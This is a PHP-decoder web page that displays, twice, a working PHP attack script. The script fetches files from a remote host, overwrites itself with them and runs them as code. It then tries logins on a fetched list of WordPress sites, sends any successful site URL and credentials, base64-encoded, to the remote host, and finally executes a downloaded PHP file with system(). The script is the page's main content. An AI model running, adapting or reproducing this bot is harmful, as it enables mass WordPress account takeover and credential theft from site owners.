Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php ini_set('max_execution_time',0); ini_set('memory_limit', '512M'); date_default_ti..

Decoded Output download

<?php 
ini_set('max_execution_time',0); 
ini_set('memory_limit', '512M'); 
date_default_timezone_set('Europe/Kiev'); 
function http_get_contents($url) { 
//	$codex = @file_get_contents($url); 
//	if (empty($codex)) { 
		$ch = curl_init(); 
		curl_setopt($ch, CURLOPT_URL, $url); 
//		curl_setopt($ch, CURLOPT_HEADER, true); 
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); 
		curl_setopt($ch, CURLOPT_TIMEOUT, 30); 
		$urlPage = curl_exec($ch); 
		curl_close($ch); 
		return($urlPage); 
//	} 
//	else { 
//		return $codex; 
//	} 
} 
file_put_contents(basename(__FILE__),http_get_contents('http://mustang.lamasuzan.com.np/st/get_cms3cper.txt')); 
file_put_contents('list.txt',http_get_contents('http://mustang.lamasuzan.com.np/st/list.txt')); 
file_put_contents('roll.txt',http_get_contents('http://mustang.lamasuzan.com.np/st/roll.txt')); 
file_put_contents('angry.txt',http_get_contents('http://mustang.lamasuzan.com.np/st/angry.txt')); 
require_once('roll.txt'); 
require_once('angry.txt'); 
file_put_contents('get_cms3cper.txt', http_get_contents('http://mustang.lamasuzan.com.np/get_cms3cper.php')); 
function callback_function($response, $info, $request) { 
	if (preg_match('~(Set-Cookie: wordpress_logged_in_)~i', $response, $out)) { 
		if (!preg_match('~(expires=Thu, 01-Jan-1970 00:00)~i', $response, $out)) { 
			$login = "cper"; 
			$password = ""; 
			echo PHP_EOL . " ===================== ok: =====================  " . $info['url'] . " - " . $login . ":" . $password . "" . PHP_EOL; 
			http_get_contents('http://mustang.lamasuzan.com.np/cms3.php?we='.base64_encode($info['url']).'&fe='.base64_encode('inc.class.cms.3.cper.php').'&cm='.base64_encode('3').'&sl='.base64_encode($login).'&sp='.base64_encode($password)); 
			goto end; 
		} 
	}	 
	end: 
	return; 
} 
$AC = new AngryCurl('callback_function'); 
//$AC->init_console(); 
$AC->load_useragent_list('list.txt'); 
$f = fopen('get_cms3cper.txt', 'r'); 
while(!feof($f)) { 
	$url = trim(fgets($f)); 
	$AC->get($url); 
} 
$AC->execute(50); 
unlink('get_cms3cper.txt'); 
system('php inc.class.cms.3.cper.php'); 
?>

Did this file decode correctly?

Original Code

<?php
ini_set('max_execution_time',0);
ini_set('memory_limit', '512M');
date_default_timezone_set('Europe/Kiev');
function http_get_contents($url) {
//	$codex = @file_get_contents($url);
//	if (empty($codex)) {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
//		curl_setopt($ch, CURLOPT_HEADER, true);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
		curl_setopt($ch, CURLOPT_TIMEOUT, 30);
		$urlPage = curl_exec($ch);
		curl_close($ch);
		return($urlPage);
//	}
//	else {
//		return $codex;
//	}
}
file_put_contents(basename(__FILE__),http_get_contents('http://mustang.lamasuzan.com.np/st/get_cms3cper.txt'));
file_put_contents('list.txt',http_get_contents('http://mustang.lamasuzan.com.np/st/list.txt'));
file_put_contents('roll.txt',http_get_contents('http://mustang.lamasuzan.com.np/st/roll.txt'));
file_put_contents('angry.txt',http_get_contents('http://mustang.lamasuzan.com.np/st/angry.txt'));
require_once('roll.txt');
require_once('angry.txt');
file_put_contents('get_cms3cper.txt', http_get_contents('http://mustang.lamasuzan.com.np/get_cms3cper.php'));
function callback_function($response, $info, $request) {
	if (preg_match('~(Set-Cookie: wordpress_logged_in_)~i', $response, $out)) {
		if (!preg_match('~(expires=Thu, 01-Jan-1970 00:00)~i', $response, $out)) {
			$login = "cper";
			$password = "";
			echo PHP_EOL . " ===================== ok: =====================  " . $info['url'] . " - " . $login . ":" . $password . "" . PHP_EOL;
			http_get_contents('http://mustang.lamasuzan.com.np/cms3.php?we='.base64_encode($info['url']).'&fe='.base64_encode('inc.class.cms.3.cper.php').'&cm='.base64_encode('3').'&sl='.base64_encode($login).'&sp='.base64_encode($password));
			goto end;
		}
	}	
	end:
	return;
}
$AC = new AngryCurl('callback_function');
//$AC->init_console();
$AC->load_useragent_list('list.txt');
$f = fopen('get_cms3cper.txt', 'r');
while(!feof($f)) {
	$url = trim(fgets($f));
	$AC->get($url);
}
$AC->execute(50);
unlink('get_cms3cper.txt');
system('php inc.class.cms.3.cper.php');
?>

Function Calls

None

Variables

None

Stats

MD5	68de6aaf26c769f7e177fd75558833ce
Eval Count	0
Decode Time	85 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats